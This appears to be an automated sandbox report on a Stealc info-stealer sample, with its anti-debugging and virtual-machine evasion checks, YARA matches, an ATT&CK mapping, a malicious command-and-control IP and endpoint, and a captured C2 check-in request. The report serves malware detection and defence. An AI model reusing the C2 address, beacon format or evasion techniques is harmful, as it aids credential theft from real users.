Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00541160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwaregS
Source: file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.0000000001264000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWb
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13659
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13656
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13678
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13670
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13710
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: i+cProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (numbers in front of a technique give the count of matching signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 45% | ReversingLabs | Win32.Trojan.Generic
file.exe | 51% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpz9jv% | file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpn9fv& | file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37e | file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phptop | file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1533036
Start date and time: 2024-10-14 11:02:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 88
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
No context
No context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948594014604717
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'854'976 bytes
MD5: e12ed88e4c214b23dfbd11ea91d2ece8
SHA1: 2a76376af58e1a12f2947de272a3e6ebb8174fe4
SHA256: 6ab0865ecbaf0e450e68a7d866f036113b50ae6edff09b1f0e41c2514cf72233
SHA512: 6d6f7213a6eaf5b5545be1d99606827c00613cef505188b46fb4e9f4149ccc047d8d2b620dd88aa33f6dd1d67aed3095eb64f853a068271d1418743f2156e1a7
SSDEEP: 49152:nQKmJu3h2Uwgz+LAPgzIL3rHGloGeNW5Y6:nQPuqi0A+U4oGeca6
TLSH: 14853320FD21E526E68443B8ED97744DA7FC61B70B9A0467C3447EDC0CF7A62C4B52AA
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaa1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                         | 0x1000 | 0x25b000 | 0x22800 | 719b4054e1a4cbbbcd6f2e7b8dcfb19a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         | 0x25e000 | 0x2a3000 | 0x200 | 01ba1c6675249cd7fa22fddeb93e55aa | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        qydepkqh | 0x501000 | 0x19f000 | 0x19ec00 | 3cea630ade093ec1dcb6b94fc491dcc3 | False | 0.9947846029234478 | data | 7.953404552841359 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        zugntyrx | 0x6a0000 | 0x1000 | 0x400 | ea4d659eaa07642a8556f77a98af9517 | False | 0.771484375 | data | 6.0857355844108305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x6a1000 | 0x3000 | 0x2200 | 3b78123bab2747ef64ba82b0c61a98fa | False | 0.05744485294117647 | DOS executable (COM) | 0.7575471514298449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-14T11:03:08.697679+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 14, 2024 11:03:07.582108021 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:07.587286949 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                        Oct 14, 2024 11:03:07.587364912 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:07.588052988 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:07.592927933 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                        Oct 14, 2024 11:03:08.314240932 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                        Oct 14, 2024 11:03:08.317508936 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:08.464716911 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:08.469602108 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                        Oct 14, 2024 11:03:08.697602987 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                        Oct 14, 2024 11:03:08.697679043 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        Oct 14, 2024 11:03:12.796339989 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                        • 185.215.113.37
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 6444 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 14, 2024 11:03:07.588052988 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 14, 2024 11:03:08.314240932 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 09:03:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 14, 2024 11:03:08.464716911 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 42 38 34 38 42 41 31 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
                        Data Ascii (line breaks restored from the CR LF bytes in the raw data):
                        ------ECGIIIDAKJDHJKFHIEBF
                        Content-Disposition: form-data; name="hwid"

                        F0B848BA18AD2322695909
                        ------ECGIIIDAKJDHJKFHIEBF
                        Content-Disposition: form-data; name="build"

                        doma
                        ------ECGIIIDAKJDHJKFHIEBF--
                        Oct 14, 2024 11:03:08.697602987 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 09:03:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=

                        Target ID:0
                        Start time:05:03:02
                        Start date:14/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x540000
                        File size:1'854'976 bytes
                        MD5 hash:E12ED88E4C214B23DFBD11EA91D2ECE8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                          Execution Graph

                          Execution Coverage:8.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
14453->14454 14455 5445c0 2 API calls 14454->14455 14456 543f05 14455->14456 14457 5445c0 2 API calls 14456->14457 14458 543f1e 14457->14458 14459 5445c0 2 API calls 14458->14459 14460 543f37 14459->14460 14461 5445c0 2 API calls 14460->14461 14462 543f50 14461->14462 14463 5445c0 2 API calls 14462->14463 14464 543f69 14463->14464 14465 5445c0 2 API calls 14464->14465 14466 543f82 14465->14466 14467 5445c0 2 API calls 14466->14467 14468 543f9b 14467->14468 14469 5445c0 2 API calls 14468->14469 14470 543fb4 14469->14470 14471 5445c0 2 API calls 14470->14471 14472 543fcd 14471->14472 14473 5445c0 2 API calls 14472->14473 14474 543fe6 14473->14474 14475 5445c0 2 API calls 14474->14475 14476 543fff 14475->14476 14477 5445c0 2 API calls 14476->14477 14478 544018 14477->14478 14479 5445c0 2 API calls 14478->14479 14480 544031 14479->14480 14481 5445c0 2 API calls 14480->14481 14482 54404a 14481->14482 14483 5445c0 2 API calls 14482->14483 14484 544063 14483->14484 14485 5445c0 2 API calls 14484->14485 14486 54407c 14485->14486 14487 5445c0 2 API calls 14486->14487 14488 544095 14487->14488 14489 5445c0 2 API calls 14488->14489 14490 5440ae 14489->14490 14491 5445c0 2 API calls 14490->14491 14492 5440c7 14491->14492 14493 5445c0 2 API calls 14492->14493 14494 5440e0 14493->14494 14495 5445c0 2 API calls 14494->14495 14496 5440f9 14495->14496 14497 5445c0 2 API calls 14496->14497 14498 544112 14497->14498 14499 5445c0 2 API calls 14498->14499 14500 54412b 14499->14500 14501 5445c0 2 API calls 14500->14501 14502 